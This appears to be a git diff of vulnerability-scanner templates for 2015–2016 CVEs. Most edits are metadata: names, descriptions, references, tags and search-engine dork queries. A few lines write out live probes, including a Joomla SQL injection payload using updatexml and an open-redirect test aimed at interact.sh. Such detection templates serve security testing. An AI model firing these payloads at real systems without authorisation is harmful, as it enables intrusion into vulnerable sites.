index 0080e52970..d6bcf99033 100644
--- a/cves/2015/CVE-2015-7297.yaml
+++ b/cves/2015/CVE-2015-7297.yaml
@@ -1,26 +1,30 @@
id: CVE-2015-7297
info:
- name: Joomla Core SQL Injection
+ name: Joomla! Core SQL Injection
author: princechaddha
severity: high
- description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
+ description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
+ - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
classification:
cve-id: CVE-2015-7297
tags: cve,cve2015,joomla,sqli
+variables:
+ num: "999999999"
+
requests:
- method: GET
path:
- - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
+ - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
words:
- - "cf79ae6addba60ad018347359bd144d2"
+ - '{{md5({{num}})}}'
part: body
# Enhanced by mp on 2022/03/02
diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml
index 04ab4ee892..cb6e058ee7 100644
--- a/cves/2015/CVE-2015-7377.yaml
+++ b/cves/2015/CVE-2015-7377.yaml
@@ -1,16 +1,18 @@
id: CVE-2015-7377
info:
- name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress Pie-Register <2.0.19 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI.
+ description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.
reference:
- https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
+ - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt
- https://nvd.nist.gov/vuln/detail/CVE-2015-7377
+ - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
classification:
cve-id: CVE-2015-7377
- tags: cve,cve2015,wordpress,wp-plugin,xss
+ tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve
requests:
- method: GET
@@ -32,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml
index e484558c5d..feebde88db 100644
--- a/cves/2015/CVE-2015-7450.yaml
+++ b/cves/2015/CVE-2015-7450.yaml
@@ -4,17 +4,20 @@ info:
name: IBM WebSphere Java Object Deserialization - Remote Code Execution
author: wdahlenb
severity: critical
- description: "IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default)."
+ description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).
reference:
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
+ - http://www-01.ibm.com/support/docview.wss?uid=swg21972799
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2015-7450
cwe-id: CWE-94
- tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java
+ metadata:
+ shodan-query: http.html:"IBM WebSphere Portal"
+ tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev
requests:
- raw:
diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml
index 79d7d4a33a..5286df5caf 100644
--- a/cves/2015/CVE-2015-7780.yaml
+++ b/cves/2015/CVE-2015-7780.yaml
@@ -1,19 +1,22 @@
id: CVE-2015-7780
info:
- name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
+ name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
author: daffainfo
severity: medium
- description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.
+ description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/35933
- https://www.cvedetails.com/cve/CVE-2015-7780/
+ - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
+ - http://jvn.jp/en/jp/JVN21968837/index.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7780
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2015-7780
cwe-id: CWE-22
- tags: cve,cve2015,lfi,manageengine
+ tags: manageengine,edb,cve,cve2015,lfi
requests:
- method: GET
@@ -37,3 +40,5 @@ requests:
part: header
words:
- "application/xml"
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml
index 84db6c7341..5df9229ec3 100644
--- a/cves/2015/CVE-2015-7823.yaml
+++ b/cves/2015/CVE-2015-7823.yaml
@@ -8,17 +8,18 @@ info:
reference:
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823
+ - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
classification:
cve-id: CVE-2015-7823
- tags: cve,cve2015,kentico,redirect
+ tags: cve,cve2015,kentico,redirect,packetstorm
requests:
- method: GET
path:
- - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
+ - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml
index 3f57ae24be..306f594c2f 100644
--- a/cves/2015/CVE-2015-8349.yaml
+++ b/cves/2015/CVE-2015-8349.yaml
@@ -1,11 +1,13 @@
id: CVE-2015-8349
info:
- name: SourceBans XSS
+ name: SourceBans <2.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
- description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
+ description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
reference:
+ - https://www.htbridge.com/advisory/HTB23273
+ - http://web.archive.org/web/20201207072921/https://www.securityfocus.com/archive/1/537018/100/0/threaded
- https://nvd.nist.gov/vuln/detail/CVE-2015-8349
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +36,5 @@ requests:
part: header
words:
- text/
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml
index 6a968d2505..9125c4579f 100644
--- a/cves/2015/CVE-2015-8399.yaml
+++ b/cves/2015/CVE-2015-8399.yaml
@@ -7,6 +7,8 @@ info:
description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
reference:
- https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
+ - https://www.exploit-db.com/exploits/39170/
+ - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
@@ -14,7 +16,7 @@ info:
cwe-id: CWE-200
metadata:
shodan-query: http.component:"Atlassian Confluence"
- tags: cve,cve2015,atlassian,confluence
+ tags: edb,cve,cve2015,atlassian,confluence
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml
index 01ed86a7ec..6bbb0c5228 100644
--- a/cves/2015/CVE-2015-8813.yaml
+++ b/cves/2015/CVE-2015-8813.yaml
@@ -1,13 +1,15 @@
id: CVE-2015-8813
info:
- name: Umbraco SSRF Vulnerability in Feedproxy.aspx
+ name: Umbraco <7.4.0- Server-Side Request Forgery
author: emadshanab
severity: high
- description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server
+ description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
reference:
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
+ - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
+ - http://www.openwall.com/lists/oss-security/2016/02/18/8
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
cvss-score: 8.2
@@ -25,3 +27,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml
index 3c302799b8..1fc165349d 100644
--- a/cves/2015/CVE-2015-9414.yaml
+++ b/cves/2015/CVE-2015-9414.yaml
@@ -1,19 +1,23 @@
id: CVE-2015-9414
info:
- name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress Symposium <=15.8.1 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter.
+ description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
+ - https://wpvulndb.com/vulnerabilities/8175
+ - https://wordpress.org/plugins/wp-symposium/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-9414
cwe-id: CWE-79
- tags: cve,cve2015,wordpress,wp-plugin,xss
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wp-symposium"
+ tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin
requests:
- method: GET
@@ -35,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml
index ac300031f7..8a5c211e3d 100644
--- a/cves/2015/CVE-2015-9480.yaml
+++ b/cves/2015/CVE-2015-9480.yaml
@@ -13,7 +13,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-9480
cwe-id: CWE-22
- tags: cve,cve2015,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/robotcpa"
+ tags: wp-plugin,lfi,edb,cve,cve2015,wordpress
requests:
- method: GET
diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml
index c4aeae7709..7635d227b6 100644
--- a/cves/2016/CVE-2016-0957.yaml
+++ b/cves/2016/CVE-2016-0957.yaml
@@ -1,16 +1,20 @@
id: CVE-2016-0957
info:
- name: Adobe AEM Console Disclosure
+ name: Adobe AEM Dispatcher <4.15 - Rules Bypass
author: geeknik
severity: high
description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
reference:
- https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
+ - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-0957
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-0957
+ metadata:
+ shodan-query: http.component:"Adobe Experience Manager"
tags: cve,cve2016,adobe,aem
requests:
@@ -31,3 +35,5 @@ requests:
- "java.lang"
- "(Runtime)"
condition: and
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml
index a9e7779769..fbf986d1c7 100644
--- a/cves/2016/CVE-2016-1000126.yaml
+++ b/cves/2016/CVE-2016-1000126.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000126
info:
- name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin admin-font-editor v1.8
+ description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=526
+ - https://wordpress.org/plugins/admin-font-editor
+ - http://web.archive.org/web/20210123183728/https://www.securityfocus.com/bid/93896/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000126
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/admin-font-editor"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml
index 4dbc7babae..cb97df8ff2 100644
--- a/cves/2016/CVE-2016-1000127.yaml
+++ b/cves/2016/CVE-2016-1000127.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000127
info:
- name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress AJAX Random Post <=2.00 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin ajax-random-post v2.00
+ description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=494
+ - https://wordpress.org/plugins/ajax-random-post
+ - http://web.archive.org/web/20210614214105/https://www.securityfocus.com/bid/93895
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml
index b824ab00f2..d2284111d6 100644
--- a/cves/2016/CVE-2016-1000128.yaml
+++ b/cves/2016/CVE-2016-1000128.yaml
@@ -1,18 +1,21 @@
id: CVE-2016-1000128
info:
- name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress anti-plagiarism <=3.60 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
+ description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000128
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/anti-plagiarism"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -35,3 +38,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml
index 1f98da8d89..c15be50002 100644
--- a/cves/2016/CVE-2016-1000129.yaml
+++ b/cves/2016/CVE-2016-1000129.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000129
info:
- name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+ description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - https://wordpress.org/plugins/defa-online-image-protector
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=449
+ - http://web.archive.org/web/20210614204644/https://www.securityfocus.com/bid/93892
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000129
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/defa-online-image-protector"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,6 @@ requests:
- type: status
status:
- 200
+
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml
index aa5fff9bcc..7916bb3e7f 100644
--- a/cves/2016/CVE-2016-1000130.yaml
+++ b/cves/2016/CVE-2016-1000130.yaml
@@ -1,17 +1,21 @@
id: CVE-2016-1000130
info:
- name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
+ name: WordPress e-search <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin e-search v1.0
+ description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - https://wordpress.org/plugins/e-search
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=394
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000130
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/e-search"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +38,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml
index 1da1ce35db..6e0ec4ec01 100644
--- a/cves/2016/CVE-2016-1000131.yaml
+++ b/cves/2016/CVE-2016-1000131.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000131
info:
- name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+ name: WordPress e-search <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin e-search v1.0
+ description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=393
+ - https://wordpress.org/plugins/e-search
+ - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000131
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/e-search"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml
index d61d51cd09..c45f6ec99c 100644
--- a/cves/2016/CVE-2016-1000132.yaml
+++ b/cves/2016/CVE-2016-1000132.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000132
info:
- name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
+ description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=37
+ - https://wordpress.org/plugins/enhanced-tooltipglossary
+ - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000132
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml
index 7533de545b..3042b76c0f 100644
--- a/cves/2016/CVE-2016-1000133.yaml
+++ b/cves/2016/CVE-2016-1000133.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000133
info:
- name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+ description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - https://wordpress.org/plugins/forget-about-shortcode-buttons
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=602
+ - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000133
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml
index 49156b4ad3..f6a6513448 100644
--- a/cves/2016/CVE-2016-1000134.yaml
+++ b/cves/2016/CVE-2016-1000134.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000134
info:
- name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
+ name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=530
+ - https://wordpress.org/plugins/hdw-tube
+ - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000134
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/hdw-tube"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml
index b14bff7762..b7341b1983 100644
--- a/cves/2016/CVE-2016-1000135.yaml
+++ b/cves/2016/CVE-2016-1000135.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000135
info:
- name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=533
+ - https://wordpress.org/plugins/hdw-tube
+ - http://web.archive.org/web/20210123183240/https://www.securityfocus.com/bid/93820/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000135
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/hdw-tube"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml
index 51da631926..2606d8cb00 100644
--- a/cves/2016/CVE-2016-1000136.yaml
+++ b/cves/2016/CVE-2016-1000136.yaml
@@ -1,18 +1,21 @@
id: CVE-2016-1000136
info:
- name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
+ name: WordPress heat-trackr 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin heat-trackr v1.0
+ description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
+ - https://wordpress.org/plugins/heat-trackr
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000136
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/heat-trackr"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -35,3 +38,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml
index 4e3f689a0a..cd7de43aba 100644
--- a/cves/2016/CVE-2016-1000137.yaml
+++ b/cves/2016/CVE-2016-1000137.yaml
@@ -1,12 +1,15 @@
id: CVE-2016-1000137
info:
- name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0
+ description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
